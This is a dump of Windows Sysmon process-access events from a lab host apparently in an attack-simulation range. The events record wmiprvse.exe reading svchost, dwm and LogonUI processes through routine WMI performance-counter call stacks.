478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150486Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150485Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150484Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150483Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150482Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150481Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150480Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150479Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150478Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150477Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150476Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150475Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150474Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150473Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150472Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150471Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.302{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a